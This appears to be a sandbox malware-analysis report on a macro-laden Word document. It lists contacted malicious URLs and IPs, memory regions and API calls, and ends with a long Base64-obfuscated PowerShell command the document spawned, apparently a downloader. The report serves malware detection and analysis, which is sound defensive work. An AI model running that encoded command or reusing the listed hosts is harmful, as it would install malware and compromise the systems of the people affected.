Persistent Malware | Sequential Behavior
Try VMRay Analyzer
|
The sample contacted only unknown URLs. |
| URL | Connection Successful | Reputation Status |
|---|---|---|
| neakmedia.com/hybfPDcL/ |
|
Unknown
|
| Hostname | IP Addresses | Country | City | Protocols | Has Blacklisted URL |
|---|---|---|---|---|---|
| neakmedia.com | 70.39.145.109 | US | Los Angeles | HTTP, DNS, TCP |
|
| 74.208.155.175 | US | Wayne | TCP |
|
|
| 167.114.121.80 | CA | Montral | TCP |
|
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:10, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:15 |
| Information | Value |
|---|---|
| PID | 0x9c4 |
| Parent PID | 0x618 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A08
0x
A04
0x
A00
0x
9FC
0x
9F8
0x
9F4
0x
9E0
0x
9DC
0x
9D4
0x
9D0
0x
9C8
0x
A48
0x
A64
0x
A98
0x
B44
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00143fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x00200fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x00360fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x00379fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory |
|
|
|
|
|
| pagefile_0x0000000000390000 | 0x00390000 | 0x00396fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x004c7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x005d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000600000 | 0x00600000 | 0x00600fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000610000 | 0x00610000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000640000 | 0x00640000 | 0x0071efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x00720fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000730000 | 0x00730000 | 0x00730fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000740000 | 0x00740000 | 0x00740fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x00750fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000760000 | 0x00760000 | 0x00760fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000770000 | 0x00770000 | 0x00770fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000780000 | 0x00780000 | 0x00780fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000790000 | 0x00790000 | 0x00790fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007a0000 | 0x007a0000 | 0x007a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007b0000 | 0x007b0000 | 0x007b0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000820000 | 0x00820000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000830000 | 0x00830000 | 0x00833fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000840000 | 0x00840000 | 0x00840fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000860000 | 0x00860000 | 0x0095ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000960000 | 0x00960000 | 0x00a5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a60000 | 0x00a60000 | 0x00a60fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00a71fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00a90fff | Pagefile Backed Memory | Readable |
|
|
|
|
| msxml6r.dll | 0x00aa0000 | 0x00aa0fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00abffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00bbffff | Private Memory | Readable, Writable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db | 0x00bc0000 | 0x00be5fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000bf0000 | 0x00bf0000 | 0x00bf0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c00000 | 0x00c00000 | 0x00c00fff | Private Memory | Readable, Writable |
|
|
|
|
| winword.exe | 0x00c10000 | 0x00de6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x019effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000019f0000 | 0x019f0000 | 0x01de2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01df0000 | 0x020befff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000020c0000 | 0x020c0000 | 0x0213ffff | Private Memory | Readable, Writable |
|
|
|
|
| c_1255.nls | 0x02140000 | 0x02150fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002160000 | 0x02160000 | 0x02160fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002170000 | 0x02170000 | 0x02170fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002180000 | 0x02180000 | 0x0227ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002280000 | 0x02280000 | 0x02280fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002290000 | 0x02290000 | 0x02290fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022a0000 | 0x022a0000 | 0x022a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022b0000 | 0x022b0000 | 0x022b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022c0000 | 0x022c0000 | 0x022c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x022d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022e0000 | 0x022e0000 | 0x022e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022f0000 | 0x022f0000 | 0x022f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002300000 | 0x02300000 | 0x02300fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002310000 | 0x02310000 | 0x02310fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002320000 | 0x02320000 | 0x02320fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002330000 | 0x02330000 | 0x02330fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002340000 | 0x02340000 | 0x02340fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x02350fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002360000 | 0x02360000 | 0x02360fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002370000 | 0x02370000 | 0x02370fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002380000 | 0x02380000 | 0x0239efff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023a0000 | 0x023a0000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025a0000 | 0x025a0000 | 0x025a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025b0000 | 0x025b0000 | 0x025b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025c0000 | 0x025c0000 | 0x025c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000025d0000 | 0x025d0000 | 0x025d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| segoeui.ttf | 0x026e0000 | 0x0275efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002770000 | 0x02770000 | 0x027affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000027b0000 | 0x027b0000 | 0x028affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028e0000 | 0x028e0000 | 0x028effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002a00000 | 0x02a00000 | 0x02dfffff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02e00000 | 0x0372ffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003760000 | 0x03760000 | 0x0385ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003860000 | 0x03860000 | 0x0389ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000038a0000 | 0x038a0000 | 0x0399ffff | Private Memory | Readable, Writable |
|
|
|
|
| seguisb.ttf | 0x039a0000 | 0x03a03fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003a10000 | 0x03a10000 | 0x03a4ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000003ad0000 | 0x03ad0000 | 0x03b0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003b70000 | 0x03b70000 | 0x03baffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003bd0000 | 0x03bd0000 | 0x03bdffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000003be0000 | 0x03be0000 | 0x043dffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004410000 | 0x04410000 | 0x0450ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004560000 | 0x04560000 | 0x0465ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004700000 | 0x04700000 | 0x0473ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000047b0000 | 0x047b0000 | 0x048affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000048b0000 | 0x048b0000 | 0x04caffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x04cb0000 | 0x04d6ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000004d70000 | 0x04d70000 | 0x0516ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005170000 | 0x05170000 | 0x0536ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005420000 | 0x05420000 | 0x0581ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000005820000 | 0x05820000 | 0x0601ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006020000 | 0x06020000 | 0x06420fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006430000 | 0x06430000 | 0x06830fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006840000 | 0x06840000 | 0x06c40fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006c50000 | 0x06c50000 | 0x06e4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006e50000 | 0x06e50000 | 0x0730ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007310000 | 0x07310000 | 0x0770ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007710000 | 0x07710000 | 0x07f0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000036890000 | 0x36890000 | 0x3689ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| osppc.dll | 0x63b00000 | 0x63b2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| riched20.dll | 0x63b30000 | 0x63cbdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| adal.dll | 0x63cc0000 | 0x63d74fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoreei.dll | 0x63d80000 | 0x63df9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwrite.dll | 0x63ed0000 | 0x63fd9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10warp.dll | 0x63fe0000 | 0x6410bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x64110000 | 0x68dfafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso.dll | 0x68e00000 | 0x6a6e3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwlib.dll | 0x6a6f0000 | 0x6bbabfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoree.dll | 0x6bbc0000 | 0x6bc09fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d11.dll | 0x6bc10000 | 0x6bc92fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msptls.dll | 0x6bca0000 | 0x6bdb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x6bdc0000 | 0x6c130fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwintl.dll | 0x6c140000 | 0x6c1fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d2d1.dll | 0x6c200000 | 0x6c2b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oart.dll | 0x6c2c0000 | 0x6d067fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msohev.dll | 0x6ed70000 | 0x6ed84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x6f5b0000 | 0x6f600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msxml6.dll | 0x6fa80000 | 0x6fbd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| office.odf | 0x70ac0000 | 0x70fbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msi.dll | 0x70fc0000 | 0x711fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x71230000 | 0x71298fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x712a0000 | 0x7135efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 194 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\program files\microsoft office\office15\winword.exe, base_address = 0xc10000 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x6d220000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoVBADigSigCallDlg@20, address_out = 0x6d34fe80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoVbaInitSecurity@4, address_out = 0x6d2d8951 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFIEPolicyAndVersion@8, address_out = 0x6d2ccd31 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6d2d882e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFInitOffice@20, address_out = 0x6d2ccd4b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoUninitOffice@4, address_out = 0x6d2896db |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFGetFontSettings@20, address_out = 0x6d281af9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoRgchToRgwch@16, address_out = 0x6d289bae |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHrSimpleQueryInterface@16, address_out = 0x6d2834e1 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHrSimpleQueryInterface2@20, address_out = 0x6d283523 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateControl@36, address_out = 0x6d284a26 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFLongLoad@8, address_out = 0x6d381250 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFLongSave@8, address_out = 0x6d381259 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFGetTooltips@0, address_out = 0x6d2bdfac |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFSetTooltips@4, address_out = 0x6d2e2845 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFLoadToolbarSet@24, address_out = 0x6d2cdd8b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateToolbarSet@28, address_out = 0x6d2823c9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHpalOffice@0, address_out = 0x6d28c568 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFWndProcNeeded@4, address_out = 0x6d2818d2 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFWndProc@24, address_out = 0x6d282a70 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateITFCHwnd@20, address_out = 0x6d281925 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoDestroyITFC@4, address_out = 0x6d28958b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x6d288820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFGetComponentManager@4, address_out = 0x6d2835a4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 0x6d28ac03 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoWideCharToMultiByte@32, address_out = 0x6d284d33 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHrRegisterAll@0, address_out = 0x6d34f8b6 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFSetComponentManager@4, address_out = 0x6d28c179 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateStdComponentManager@20, address_out = 0x6d2819d5 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFHandledMessageNeeded@4, address_out = 0x6d286736 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoPeekMessage@8, address_out = 0x6d28649f |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateIPref@28, address_out = 0x6d27f9cf |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoDestroyIPref@4, address_out = 0x6d289320 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoChsFromLid@4, address_out = 0x6d27f864 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoCpgFromChs@4, address_out = 0x6d281cc5 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoSetLocale@4, address_out = 0x6d27f984 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6d28198e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoSetVbaInterfaces@8, address_out = 0x6d34ff8d |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoGetControlInstanceId@8, address_out = 0x6d3286e7 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x76ba0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SysFreeString, address_out = 0x76ba3e59 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLib, address_out = 0x76bb0aa2 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x76bc1ea6 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x76bd351b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x76bd1ca9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleTranslateColor, address_out = 0x76bd26fa |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x76bc352f |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x76bc3df8 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPicture, address_out = 0x76c07c49 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x76c093fc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x76c0944a |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleIconToCursor, address_out = 0x76c0776e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x76bb07b7 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x76c070a1 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 0x6d28ac03 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x720d0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x721a2b76 |
|
1 | |
| Process | Create | process_name = pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2